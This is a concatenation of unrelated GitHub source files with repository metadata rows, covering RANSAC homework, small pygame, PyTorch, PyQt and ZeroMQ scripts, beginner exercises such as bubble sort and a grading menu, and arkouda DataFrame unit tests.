# #### Question 3a: Plotting $k$ vs. $S(0.99, 0.7, k), k\in\{1...20\}$
# In[14]:
show_scatter_plot(
range(1, 21), lambda k : S(0.99, 0.7, k),
"k (Sample Size)",
"S (Number of Iterations to Fit with 99% probability)"
)
# #### Question 3b: Plotting $p$ vs. $S(0.99, p, 5), p\in[0.1, 0.5]$
# In[15]:
show_scatter_plot(
(x / 100 for x in range(10, 51)), lambda p : S(0.99, p, 5),
"p (Proportion of Inliers)",
"S (Number of Iterations to Fit with 99% probability)"
)
# #### Question 3c: RANSAC Analysis
#
# The required number of iterations is 14389 ($S$ evaluates to 14388.85, which we round up to guarantee the 99% success probability):
#
# $$S(P, p, k) =\frac{log(1-P)}{log(1-p^k)}$$
#
# $$P = 0.99, p = 0.2, k = 5 $$
#
# $$S(0.99, 0.2, 5) =\frac{log(1-0.99)}{log(1-0.2^5)} $$
#
# $$S(P, p, k)= \frac{-2}{log(1-0.00032)} $$
#
# $$S(P, p, k)= \frac{-2}{log(0.99968)} $$
#
# $$S(P, p, k)= \frac{-2}{-0.00013899647} $$
#
# $$ S(P, p, k)= 14388.85 $$
#
# The number of required iterations would *NOT* change.
#
# RANSAC will repeatedly propose and evaluate models for a set number of iterations, and then choose the best matching model out of all iterations. The algorithm won't stop early if it proposes a good model early on - it just keeps going to verify if that model is the best.
#
# The required number of iterations is dependent on a **prior** estimate of inlier probability. This is a hyper-parameter of the model and is chosen before runtime. The estimate may not align with the actual number of inliers for any given set of points. For the example given in this question, $p=0.2$ might be a little pessimistic, given that the model proposed after just a few iterations had an inlier proportion of almost 1/3.
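# In[16]:
# A quick illustrative check of the arithmetic above, reusing the S function
# defined for Question 3 (the math module is already imported for S):
print(math.ceil(S(0.99, 0.2, 5)))  # -> 14389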
| br3nd4nn34l/CSC420-Fall-2018 | assignments/a2/a2.py | a2.py | py | 30,486 | python | en | code | 0 | github-code | 13 |
73822458576 | import pandas as pd
import csv
# with pandas
df = pd.read_csv('weather_data.csv')
print(df)
print(df.nunique())
print(df.info())
temp_list = df['temp']
print(temp_list)
# with csv
with open('weather_data.csv') as data_file:
data = csv.reader(data_file)
temperature = []
day_week = []
week_condition = []
    # csv.reader can only be iterated once; the original three separate loops
    # left the reader exhausted after the first pass, so all three columns are
    # collected in a single pass here
    for row in data:
        if row[0] != 'day':  # skip the header row
            day_week.append(row[0])
            temperature.append(int(row[1]))
            week_condition.append(row[2])
print(temperature)
print(day_week)
print(week_condition)
print(type(df))
| Marksman007577/Python-Usecase | Python 100 Days/Day 25/read_csv.py | read_csv.py | py | 678 | python | en | code | 0 | github-code | 13 |
24664088169 | import pygame
import random
import time
from src.load_image import load_image
class Platform(pygame.sprite.Sprite):
    v0y = 400  # initial vertical (bounce) velocity; Trampoline and Spring override it with larger values
def __init__(self, y, color, game_properties, *groups, **kwargs):
super().__init__(*groups)
self.game_properties = game_properties
self.x, self.y = random.randint(5, self.game_properties.width - 50), y
self.color = color
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
self.rect = pygame.Rect(self.x, self.y, 50, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 20, 50, 10))
def update(self):
if self.y <= self.game_properties.height:
self.y += self.game_properties.delta
else:
self.x = random.randint(10, self.game_properties.width - 60)
self.y = -50
self.rect.x, self.rect.y = int(self.x), int(self.y)
class MovingPlatform(Platform):
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.vx = (random.randint(0, 1) * 2 - 1) * 50
self.border = (5, self.game_properties.width - 55)
self.last_change_time = time.time()
self.x0 = self.x
def update(self):
delta_time = time.time() - self.last_change_time
self.x = self.x0 + self.vx * delta_time
if self.x <= self.border[0] and self.vx < 0 or \
self.x >= self.border[1] and self.vx > 0:
self.last_change_time = time.time()
self.x0 = self.x
self.vx = -self.vx
super().update()
class BreakablePlatform(Platform):
def __init__(self, y, color, *groups, **kwargs):
self.time = -1
super().__init__(y, color, *groups, **kwargs)
def update(self):
if self.time + 0.5 < time.time() and self.time != -1:
self.destroyed()
if self.y <= self.game_properties.height:
self.y += self.game_properties.delta
else:
self.x = random.randint(10, self.game_properties.width - 60)
self.y = -50
pygame.draw.rect(self.image, pygame.Color("grey"), (0, 20, 50, 10))
self.rect.x, self.rect.y = int(self.x), int(self.y)
def broken(self):
self.time = time.time()
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, pygame.Color("grey"), (0, 20, 15, 10))
pygame.draw.rect(self.image, pygame.Color("grey"), (18, 20, 14, 10))
pygame.draw.rect(self.image, pygame.Color("grey"), (35, 20, 15, 10))
def destroyed(self):
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
self.time = -1
self.block = True
class Trampoline(Platform):
v0y = 650
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.image = pygame.Surface((55, 40), pygame.SRCALPHA, 32)
self.image.blit(load_image('images/trampoline.jpg', 55, 20), (0, 20))
self.rect = pygame.Rect(0, 0, 55, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 30, 55, 10))
class Spring(Platform):
v0y = 900
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.image = pygame.Surface((55, 40), pygame.SRCALPHA, 32)
self.image.blit(load_image('images/spring.jpg', 55, 20), (0, 20))
self.rect = pygame.Rect(0, 0, 55, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 30, 55, 10))
| VileHero-Alex/python_project_doodle_jump | src/platforms.py | platforms.py | py | 3,637 | python | en | code | 0 | github-code | 13 |
34510790322 | # Author: Logan deLaar
# Github: Logandelaar1
import glob
import os
# Change directory_path to point at the labels folder of your downloaded Roboflow dataset
directory_path = 'path/to/labels/folder/in/downloaded/roboflow/folder'
# Use glob to get all .txt files in the directory
for filename in glob.glob(os.path.join(directory_path, '*.txt')):
with open(filename, 'r') as file:
# Read all lines in the file
lines = file.readlines()
with open(filename, 'w') as file:
# Write back only lines that don't start with '0'
for line in lines:
if not line.startswith('0'):
file.write(line)
| logandelaar1/Yolo-Data-Parser | yolodataparser_autodelete.py | yolodataparser_autodelete.py | py | 620 | python | en | code | 0 | github-code | 13 |
19374063297 | import zmq
import time
import numpy as np
import multiprocessing as mp
# import signal
# import sys
# def signal_handler(sig, frame):
# print("Keyboard interrupt received. Exiting...")
# sys.exit(0)
# signal.signal(signal.SIGINT, signal_handler)
class GPCRequester(mp.Process):
def __init__(self, queue: mp.Queue, address: str = "localhost", port: int = 5555):
super(GPCRequester, self).__init__()
self.queue = queue
self.url = f"tcp://{address}:{port}"
def run(self) -> None:
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(self.url)
print("Connected to GPC server")
while True:
try:
data, timestamp = self.queue.get()
socket.send_string("Send GPC")
except KeyboardInterrupt:
break
socket.close()
class GPCServer(mp.Process):
def __init__(self, address: str = "*", port: int = 5555):
super(GPCServer, self).__init__()
self.url = f"tcp://{address}:{port}"
def run(self) -> None:
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.bind(self.url)
print("GPC server started")
while True:
try:
msg = socket.recv_string()
print(msg)
except KeyboardInterrupt:
break
socket.close()
def main():
# queue = mp.Queue()
gpc_server = GPCServer()
gpc_server.start()
# gpc_requester = GPCRequester(queue)
# gpc_requester.start()
# for i in range(10):
# queue.put((i, time.time()))
# time.sleep(1)
# gpc_requester.terminate()
# gpc_server.terminate()
# gpc_requester.join()
gpc_server.join()
if __name__ == "__main__":
main()
| localization-as-a-service/liloc-demo | communication_sim.py | communication_sim.py | py | 1,936 | python | en | code | 0 | github-code | 13 |
16069156190 | def Bubble_Sort(a):
b=len(a)-1
for i in range(b):
for y in range(b-i):
if a[y]>a[y+1]:
a[y],a[y+1]=a[y+1],a[y]
return a
a=[]
n=int(input('Enter the size: '))
for j in range(n):
    num=int(input())  # convert to int so the sort compares numbers, not strings
    a.append(num)
Bubble_Sort(a)
print('\nSorted array: ')
for i in range(n):
print(a[i])
| Shusovan/Basic-Python-Programming | Bubble Sort.py | Bubble Sort.py | py | 355 | python | en | code | 2 | github-code | 13 |
31015659683 | #-*- codeing=utf-8 -*-
#@time: 2020/8/26 9:49
#@Author: Shang-gang Lee
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class fasttext(nn.Module):
def __init__(self, vocab_size, embedding_dim, class_nums):
super().__init__()
self.embedding=nn.Embedding(vocab_size,embedding_dim) #[batch_size,words,embedding_dims]
self.hidden=nn.AdaptiveAvgPool2d((1,embedding_dim)) #[batch_size,embedding_dims]
self.fc=nn.Linear(embedding_dim,class_nums) #[batch_size,class_nums]
def forward(self,x):
embed=self.embedding(x)
avgEmbed=self.hidden(embed)
avgEmbed=avgEmbed.squeeze(dim=1)
output=self.fc(avgEmbed)
        # return raw logits: nn.CrossEntropyLoss applies log-softmax internally,
        # so an extra F.softmax here would hurt training (apply softmax only at inference)
        return output
model=fasttext(vocab_size=2000,embedding_dim=100,class_nums=5)
input=torch.randint(low=0,high=2000,size=[64,50])
pred=model(input)
loss_function=nn.CrossEntropyLoss()
optimizer=optim.SGD(model.parameters(),lr=0.001)
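# Illustrative single training step with hypothetical random labels, to show
# that CrossEntropyLoss consumes the raw logits returned by the model:
labels=torch.randint(low=0,high=5,size=[64])
loss=loss_function(pred,labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()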
| shanggangli/Research-in-NLP | units/FastTextModel.py | FastTextModel.py | py | 1,028 | python | en | code | 0 | github-code | 13 |
74211540817 |
from PyQt5.QtGui import QPagedPaintDevice # !! Not in QtPrintSupport
from qtPrintFramework.pageLayout.model.adaptedModel import AdaptedModel, AdaptedSortedModel
class AdaptedPageNameToEnumModel(AdaptedSortedModel): # !!! Sorted
'''
Dictionary from name to page enum.
From Qt's enum.
Static, a fixed set for use with paperless printers (PDF) that can 'print' to any size you specify.
'''
def _createValues(self, printerAdaptor=None):
''' See super. '''
'''
Dictionary keyed by names of page sizes, of enum values.
For all page sizes in QPagedPaintDevice enum.
A current printer might support a different set. Typically a subset.
(Depends on physical paper loaded in physical trays.)
!!! Alternate design: Custom is in model.
Here, we are excluding it from this model used only by the framework's Page Setup PDF dialog.
!!! No i18n for page names: assume names are internationally recognized.
'''
self.value = AdaptedSortedModel._getAdaptedDictionary(enumOwningClass=QPagedPaintDevice,
enumType=QPagedPaintDevice.PageSize) # !!! Paper/Page confusion
assert isinstance(self.value, dict)
self._deleteCustomPaper()
print(self.value)
def _deleteCustomPaper(self):
self.value.pop("Custom", None)
pageNameToEnum = AdaptedPageNameToEnumModel().value # singleton
pageEnumToName = AdaptedModel._getAdaptedReverseDictionary(enumOwningClass=QPagedPaintDevice,
enumType=QPagedPaintDevice.PageSize) | bootchk/qtPrintFramework | qtPrintFramework/pageLayout/model/pageNameToEnum.py | pageNameToEnum.py | py | 1,615 | python | en | code | 2 | github-code | 13 |
219880823 | import sys
# sys.stdin = open("input.txt", "rt")
'''
n = int(input())
arr = []
zeros = [0] * (n + 2)
arr.append(zeros)
for _ in range(n):
tmp = [0] + list(map(int, input().split())) + [0]
arr.append(tmp)
arr.append(zeros)
cnt = 0
for i in range(1, n + 1):
for j in range(1, n + 1):
comp = [arr[i - 1][j],
arr[i + 1][j],
arr[i][j - 1],
arr[i][j + 1]]
for element in comp:
if arr[i][j] <= element:
break
else:
cnt += 1
print(cnt)
'''
n = int(input())
arr = [list(map(int, input().split())) for _ in range(n)]
arr.insert(0, [0] * n)
arr.append([0] * n)
for row in arr:
row.insert(0, 0)
row.append(0)
di = [-1, 0, 1, 0]
dj = [0, 1, 0, -1]
cnt = 0
for i in range(1, n + 1):
for j in range(1, n + 1):
if all(arr[i][j] > arr[i + di[k]][j + dj[k]] for k in range(4)):
cnt += 1
print(cnt)
| ignis535/baekjoon | 탐색 & 시뮬레이션/봉우리.py | 봉우리.py | py | 958 | python | en | code | 0 | github-code | 13 |
29018022835 | #함수 이름은 변경 가능합니다.
class NotnumberOfdata(Exception):
def __init__(self):
        super().__init__('Number of data fields is not 3!')
class AlreadyExist(Exception):
def __init__(self):
        super().__init__('Name already exists!')
class NotInteger(Exception):
def __init__(self):
        super().__init__('Score is not a positive integer!')
class NoNewGradeStudent(Exception):
def __init__(self):
        super().__init__('There is no student to assign a new grade to!')
class NoneStudent(Exception):
def __init__(self):
super().__init__('No student data!')
class ExistNoneGradeStudent(Exception):
def __init__(self):
super().__init__("There is a student who didn't get grade!")
def Menu1(x) :
x[1]=int(x[1])
x[2]=int(x[2])
name=x[0]
m_score=x[1]
f_score=x[2]
student.append(name)
studentInfo.insert(student.index(name),{'name':name,'m_score':m_score,'f_score':f_score, 'grade':'none'})
def Menu2(i):
if (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=90:
studentInfo[i]['grade']='A'
elif (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=80:
studentInfo[i]['grade']='B'
elif (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=70:
studentInfo[i]['grade']='C'
else:
studentInfo[i]['grade']='D'
def Menu3():
print('---------------------------------')
print(' name mid final grade')
print('---------------------------------')
for i in range(len(student)):
print(' %5s %3d %5d %5s'%(studentInfo[i]['name'],studentInfo[i]['m_score'],studentInfo[i]['f_score'],studentInfo[i]['grade']))
def Menu4(deleteStd):
del studentInfo[student.index(deleteStd)]
del student[student.index(deleteStd)]
student=[]
studentInfo=[]
count=0
print("*Menu*******************************")
print("1. Inserting students Info(name score1 score2)")
print("2. Grading")
print("3. Printing students Info")
print("4. Deleting students Info")
print("5. Exit program")
print("*************************************")
while True :
choice = input("Choose menu 1, 2, 3, 4, 5 : ")
if choice == "1":
try:
x=list(map(str,input('Enter name mid-score final-score: ').split()))
if len(x)!=3:
raise NotnumberOfdata
if x[0] in student:
raise AlreadyExist
try:
x[1]=int(x[1])
x[2]=int(x[2])
            except ValueError:
                print('Score is not a positive integer!')
                continue
            else:
                if x[1]<0 or x[2]<0:
                    raise NotInteger
except Exception as e:
print(e)
else:
Menu1(x)
elif choice == "2":
count=0
try:
if len(student)==0:
raise NoneStudent
for i in range(len(student)):
if studentInfo[i]['grade']=='none':
count+=1
Menu2(i)
if count==0:
raise NoNewGradeStudent
except Exception as e:
print(e)
else:
            print('Graded all students')
elif choice == "3" :
try:
if len(student)==0:
raise NoneStudent
for i in range(len(student)):
if studentInfo[i]['grade']=='none':
raise ExistNoneGradeStudent
except Exception as e:
print(e)
else:
Menu3()
elif choice == "4" :
try:
if len(student)==0:
raise NoneStudent
except Exception as e:
print(e)
else:
deleteStd=input('Enter the name to delete :')
if deleteStd not in student:
                print('Name does not exist!')
else:
Menu4(deleteStd)
print('%s information is deleted.'%deleteStd)
elif choice == "5" :
print('Exit Program!')
break
else:
print('Wrong number.Choose again')
| kkl4846/KimKyunglin | python_problem/studentprogram.py | studentprogram.py | py | 4,432 | python | en | code | 0 | github-code | 13 |
70136628498 | import datetime
# Define a dictionary to store mood data for each day of the week
moods = {}
# Define a list of mood options
mood_options = ['Happy', 'Sad', 'Excited', 'Angry', 'Calm']
# Get the current day of the week
current_day = datetime.datetime.now().strftime("%A")
# Prompt the user to enter their mood for the current day
while True:
print(f"How do you feel on {current_day}? (Choose from {', '.join(mood_options)}): ")
mood = input()
# Validate user input
if mood in mood_options:
moods[current_day] = mood
break
else:
print("Invalid mood. Please choose from the available options.")
# Display the results to the user
print("\nHere's how you've been feeling this week:")
for day, mood in moods.items():
print(f"{day}: {mood}")
| Ellnutt/Feeling | moodtrk.py | moodtrk.py | py | 790 | python | en | code | 2 | github-code | 13 |
35735181288 | # Exercise 5: Bottle Deposits
def bottle_deposit():
# Reading container count for each size from user
    one_ltr_cost = 0.10  # $0.10 deposit for containers holding 1 litre or less
one_ltr_more_cst = 0.25
    one_ltr_less = int(input("Enter number of containers which are less than or equal to 1 liter: "))
    one_ltr_more = int(input("Enter number of containers which are more than 1 liter: "))
# Computing refund for the container
refund = one_ltr_less * one_ltr_cost + one_ltr_more * one_ltr_more_cst
print("Your total refund is :", round(refund, 2), "$")
bottle_deposit()
| KashyapTushar/kashyaptushar.github.io | Python_Workbook/Ex5_Bottle_Deposit.py | Ex5_Bottle_Deposit.py | py | 551 | python | en | code | 0 | github-code | 13 |
32045617830 | import numpy as np
import pandas as pd
import pytest
from pandas.testing import assert_frame_equal, assert_series_equal
import arkouda as ak
class TestDataFrame:
@staticmethod
def build_pd_df():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"]
userid = [111, 222, 111, 333, 222, 111]
item = [0, 0, 1, 1, 2, 0]
day = [5, 5, 6, 5, 6, 6]
amount = [0.5, 0.6, 1.1, 1.2, 4.3, 0.6]
bi = [2**200, 2**200 + 1, 2**200 + 2, 2**200 + 3, 2**200 + 4, 2**200 + 5]
ui = (np.arange(6).astype(ak.uint64)) + 2**63
return pd.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_ak_df():
return ak.DataFrame(TestDataFrame.build_pd_df())
@staticmethod
def build_pd_df_duplicates():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"]
userid = [111, 222, 111, 333, 222, 111]
item = [0, 1, 0, 2, 1, 0]
day = [5, 5, 5, 5, 5, 5]
return pd.DataFrame({"userName": username, "userID": userid, "item": item, "day": day})
@staticmethod
def build_ak_df_duplicates():
return ak.DataFrame(TestDataFrame.build_pd_df_duplicates())
@staticmethod
def build_ak_append():
username = ak.array(["John", "Carol"])
userid = ak.array([444, 333])
item = ak.array([0, 2])
day = ak.array([1, 2])
amount = ak.array([0.5, 5.1])
bi = ak.array([2**200 + 6, 2**200 + 7])
ui = ak.array([6, 7], dtype=ak.uint64) + 2**63
return ak.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_pd_df_append():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice", "John", "Carol"]
userid = [111, 222, 111, 333, 222, 111, 444, 333]
item = [0, 0, 1, 1, 2, 0, 0, 2]
day = [5, 5, 6, 5, 6, 6, 1, 2]
amount = [0.5, 0.6, 1.1, 1.2, 4.3, 0.6, 0.5, 5.1]
bi = (np.arange(8) + 2**200).tolist()
ui = (np.arange(8).astype(ak.uint64)) + 2**63
return pd.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_ak_keyerror():
userid = ak.array([444, 333])
item = ak.array([0, 2])
return ak.DataFrame({"user_id": userid, "item": item})
@staticmethod
def build_ak_typeerror():
username = ak.array([111, 222, 111, 333, 222, 111])
userid = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
item = ak.array([0, 0, 1, 1, 2, 0])
day = ak.array([5, 5, 6, 5, 6, 6])
amount = ak.array([0.5, 0.6, 1.1, 1.2, 4.3, 0.6])
bi = ak.arange(2**200, 2**200 + 6)
ui = ak.arange(6, dtype=ak.uint64) + 2**63
return ak.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@pytest.mark.parametrize("size", pytest.prob_size)
def test_dataframe_creation(self, size):
# Validate empty DataFrame
df = ak.DataFrame()
assert isinstance(df, ak.DataFrame)
assert df.empty
# Validation of Creation from Pandas
pddf = pd.DataFrame(
{
"int": np.arange(size),
"uint": np.random.randint(0, size / 2, size, dtype=np.uint64),
"bigint": np.arange(2**200, 2**200 + size),
"bool": np.random.randint(0, 1, size=size, dtype=bool),
"segarray": [np.random.randint(0, size / 2, 2) for i in range(size)],
}
)
akdf = ak.DataFrame(pddf)
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == size
assert_frame_equal(pddf, akdf.to_pandas())
# validation of creation from dictionary
akdf = ak.DataFrame(
{
"int": ak.arange(size),
"uint": ak.array(pddf["uint"]),
"bigint": ak.arange(2**200, 2**200 + size),
"bool": ak.array(pddf["bool"]),
"segarray": ak.SegArray.from_multi_array([ak.array(x) for x in pddf["segarray"]]),
}
)
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == size
assert_frame_equal(pddf, akdf.to_pandas())
# validation of creation from list
x = [
np.arange(size),
np.random.randint(0, 5, size),
np.random.randint(5, 10, size),
]
pddf = pd.DataFrame(x)
akdf = ak.DataFrame([ak.array(val) for val in list(zip(*x))])
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == len(pddf)
# arkouda does not allow for numeric columns.
assert akdf.columns == [str(x) for x in pddf.columns.values]
# use the columns from the pandas created for equivalence check
# these should be equivalent
ak_to_pd = akdf.to_pandas()
ak_to_pd.columns = pddf.columns
assert_frame_equal(pddf, ak_to_pd)
def test_client_type_creation(self):
f = ak.Fields(ak.arange(10), ["A", "B", "c"])
ip = ak.ip_address(ak.arange(10))
d = ak.Datetime(ak.arange(10))
bv = ak.BitVector(ak.arange(10), width=4)
df_dict = {"fields": f, "ip": ip, "date": d, "bitvector": bv}
df = ak.DataFrame(df_dict)
pd_d = [pd.to_datetime(x, unit="ns") for x in d.to_list()]
pddf = pd.DataFrame(
{"fields": f.to_list(), "ip": ip.to_list(), "date": pd_d, "bitvector": bv.to_list()}
)
assert_frame_equal(pddf, df.to_pandas())
# validate that set max_rows adjusts the repr properly
shape = f"({df._shape_str()})".replace("(", "[").replace(")", "]")
pd.set_option("display.max_rows", 4)
s = df.__repr__().replace(f" ({df._shape_str()})", f"\n\n{shape}")
assert s == pddf.__repr__()
pddf = pd.DataFrame({"a": list(range(1000)), "b": list(range(1000))})
pddf["a"] = pddf["a"].apply(lambda x: "AA" + str(x))
pddf["b"] = pddf["b"].apply(lambda x: "BB" + str(x))
df = ak.DataFrame(pddf)
assert_frame_equal(pddf, df.to_pandas())
pd.set_option("display.max_rows", 10)
shape = f"({df._shape_str()})".replace("(", "[").replace(")", "]")
s = df.__repr__().replace(f" ({df._shape_str()})", f"\n\n{shape}")
assert s == pddf.__repr__()
def test_boolean_indexing(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
row = df[df["userName"] == "Carol"]
assert len(row) == 1
assert ref_df[ref_df["userName"] == "Carol"].equals(row.to_pandas(retain_index=True))
def test_column_indexing(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
# index validation
assert isinstance(df.index, ak.Index)
assert df.index.to_list() == ref_df.index.to_list()
for cname in df.columns:
col, ref_col = getattr(df, cname), getattr(ref_df, cname)
assert isinstance(col, ak.Series)
assert col.to_list() == ref_col.to_list()
assert isinstance(df[cname], (ak.pdarray, ak.Strings, ak.Categorical))
assert df[cname].to_list() == ref_df[cname].to_list()
# check mult-column list
col_list = ["userName", "amount", "bi"]
assert isinstance(df[col_list], ak.DataFrame)
assert_frame_equal(df[col_list].to_pandas(), ref_df[col_list])
# check multi-column tuple
col_tup = ("userID", "item", "day", "bi")
assert isinstance(df[col_tup], ak.DataFrame)
# pandas only supports lists of columns, not tuples
assert_frame_equal(df[col_tup].to_pandas(), ref_df[list(col_tup)])
def test_dtype_prop(self):
str_arr = ak.random_strings_uniform(1, 5, 3)
df_dict = {
"i": ak.arange(3),
"c_1": ak.arange(3, 6, 1),
"c_2": ak.arange(6, 9, 1),
"c_3": str_arr,
"c_4": ak.Categorical(ak.array(["str"] * 3)),
"c_5": ak.SegArray(ak.array([0, 9, 14]), ak.arange(20)),
"c_6": ak.arange(2**200, 2**200 + 3),
}
akdf = ak.DataFrame(df_dict)
assert len(akdf.columns) == len(akdf.dtypes)
# dtypes returns objType for categorical, segarray. We should probably fix
# this and add a df.objTypes property. pdarrays return actual dtype
for ref_type, c in zip(
["int64", "int64", "int64", "str", "Categorical", "SegArray", "bigint"], akdf.columns
):
assert ref_type == str(akdf.dtypes[c])
def test_drop(self):
# create an arkouda df.
df = self.build_ak_df()
# create pandas df to validate functionality against
pd_df = self.build_pd_df()
# test out of place drop
df_drop = df.drop([0, 1, 2])
pddf_drop = pd_df.drop(labels=[0, 1, 2])
pddf_drop.reset_index(drop=True, inplace=True)
assert_frame_equal(pddf_drop, df_drop.to_pandas())
df_drop = df.drop("userName", axis=1)
pddf_drop = pd_df.drop(labels=["userName"], axis=1)
assert_frame_equal(pddf_drop, df_drop.to_pandas())
# Test dropping columns
df.drop("userName", axis=1, inplace=True)
pd_df.drop(labels=["userName"], axis=1, inplace=True)
assert_frame_equal(pd_df, df.to_pandas())
# Test dropping rows
df.drop([0, 2, 5], inplace=True)
# pandas retains original indexes when dropping rows, need to reset to line up with arkouda
pd_df.drop(labels=[0, 2, 5], inplace=True)
pd_df.reset_index(drop=True, inplace=True)
assert_frame_equal(pd_df, df.to_pandas())
# verify that index keys must be ints
with pytest.raises(TypeError):
df.drop("index")
# verify axis can only be 0 or 1
with pytest.raises(ValueError):
df.drop("amount", 15)
def test_drop_duplicates(self):
df = self.build_ak_df_duplicates()
ref_df = self.build_pd_df_duplicates()
dedup = df.drop_duplicates()
dedup_pd = ref_df.drop_duplicates()
# pandas retains original indexes when dropping dups, need to reset to line up with arkouda
dedup_pd.reset_index(drop=True, inplace=True)
dedup_test = dedup.to_pandas().sort_values("userName").reset_index(drop=True)
dedup_pd_test = dedup_pd.sort_values("userName").reset_index(drop=True)
assert_frame_equal(dedup_pd_test, dedup_test)
def test_shape(self):
df = self.build_ak_df()
row, col = df.shape
assert row == 6
assert col == 7
def test_reset_index(self):
df = self.build_ak_df()
slice_df = df[ak.array([1, 3, 5])]
assert slice_df.index.to_list() == [1, 3, 5]
df_reset = slice_df.reset_index()
assert df_reset.index.to_list() == [0, 1, 2]
        assert slice_df.index.to_list() == [1, 3, 5]
slice_df.reset_index(inplace=True)
        assert slice_df.index.to_list() == [0, 1, 2]
def test_rename(self):
df = self.build_ak_df()
rename = {"userName": "name_col", "userID": "user_id"}
# Test out of Place - column
df_rename = df.rename(rename, axis=1)
assert "user_id" in df_rename.columns
assert "name_col" in df_rename.columns
assert "userName" not in df_rename.columns
assert "userID" not in df_rename.columns
assert "userID" in df.columns
assert "userName" in df.columns
assert "user_id" not in df.columns
assert "name_col" not in df.columns
# Test in place - column
df.rename(column=rename, inplace=True)
assert "user_id" in df.columns
assert "name_col" in df.columns
assert "userName" not in df.columns
assert "userID" not in df.columns
# prep for index renaming
rename_idx = {1: 17, 2: 93}
conf = list(range(6))
conf[1] = 17
conf[2] = 93
# Test out of Place - index
df_rename = df.rename(rename_idx)
assert df_rename.index.values.to_list() == conf
assert df.index.values.to_list() == list(range(6))
# Test in place - index
df.rename(index=rename_idx, inplace=True)
assert df.index.values.to_list() == conf
def test_append(self):
df = self.build_ak_df()
df.append(self.build_ak_append())
ref_df = self.build_pd_df_append()
# dataframe equality returns series with bool result for each row.
assert_frame_equal(ref_df, df.to_pandas())
idx = np.arange(8)
assert idx.tolist() == df.index.index.to_list()
df_keyerror = self.build_ak_keyerror()
with pytest.raises(KeyError):
df.append(df_keyerror)
df_typeerror = self.build_ak_typeerror()
with pytest.raises(TypeError):
df.append(df_typeerror)
def test_concat(self):
df = self.build_ak_df()
glued = ak.DataFrame.concat([df, self.build_ak_append()])
ref_df = self.build_pd_df_append()
# dataframe equality returns series with bool result for each row.
assert_frame_equal(ref_df, glued.to_pandas())
df_keyerror = self.build_ak_keyerror()
with pytest.raises(KeyError):
ak.DataFrame.concat([df, df_keyerror])
df_typeerror = self.build_ak_typeerror()
with pytest.raises(TypeError):
ak.DataFrame.concat([df, df_typeerror])
def test_head(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
hdf = df.head(3)
hdf_ref = ref_df.head(3).reset_index(drop=True)
assert_frame_equal(hdf_ref, hdf.to_pandas())
def test_tail(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
tdf = df.tail(2)
tdf_ref = ref_df.tail(2).reset_index(drop=True)
assert_frame_equal(tdf_ref, tdf.to_pandas())
def test_groupby_standard(self):
df = self.build_ak_df()
gb = df.GroupBy("userName")
keys, count = gb.count()
assert keys.to_list() == ["Bob", "Alice", "Carol"]
assert count.to_list() == [2, 3, 1]
assert gb.permutation.to_list() == [1, 4, 0, 2, 5, 3]
gb = df.GroupBy(["userName", "userID"])
keys, count = gb.count()
assert len(keys) == 2
assert keys[0].to_list() == ["Carol", "Bob", "Alice"]
assert keys[1].to_list() == [333, 222, 111]
assert count.to_list() == [1, 2, 3]
# testing counts with IPv4 column
s = ak.DataFrame({"a": ak.IPv4(ak.arange(1, 5))}).groupby("a").count()
pds = pd.Series(
data=np.ones(4, dtype=np.int64),
index=pd.Index(data=np.array(["0.0.0.1", "0.0.0.2", "0.0.0.3", "0.0.0.4"], dtype="<U7")),
)
assert_series_equal(pds, s.to_pandas())
# testing counts with Categorical column
s = ak.DataFrame({"a": ak.Categorical(ak.array(["a", "a", "a", "b"]))}).groupby("a").count()
pds = pd.Series(data=np.array([3, 1]), index=pd.Index(data=np.array(["a", "b"], dtype="<U7")))
assert_series_equal(pds, s.to_pandas())
def test_gb_series(self):
df = self.build_ak_df()
gb = df.GroupBy("userName", use_series=True)
c = gb.count()
assert isinstance(c, ak.Series)
assert c.index.to_list() == ["Bob", "Alice", "Carol"]
assert c.values.to_list() == [2, 3, 1]
@pytest.mark.parametrize("agg", ["sum", "first"])
def test_gb_aggregations(self, agg):
df = self.build_ak_df()
pd_df = self.build_pd_df()
# remove strings col because many aggregations don't support it
cols_without_str = list(set(df.columns) - {"userName"})
df = df[cols_without_str]
pd_df = pd_df[cols_without_str]
group_on = "userID"
for col in df.columns:
if col == group_on:
# pandas groupby doesn't return the column used to group
continue
ak_ans = getattr(df.groupby(group_on), agg)(col)
pd_ans = getattr(pd_df.groupby(group_on), agg)()[col]
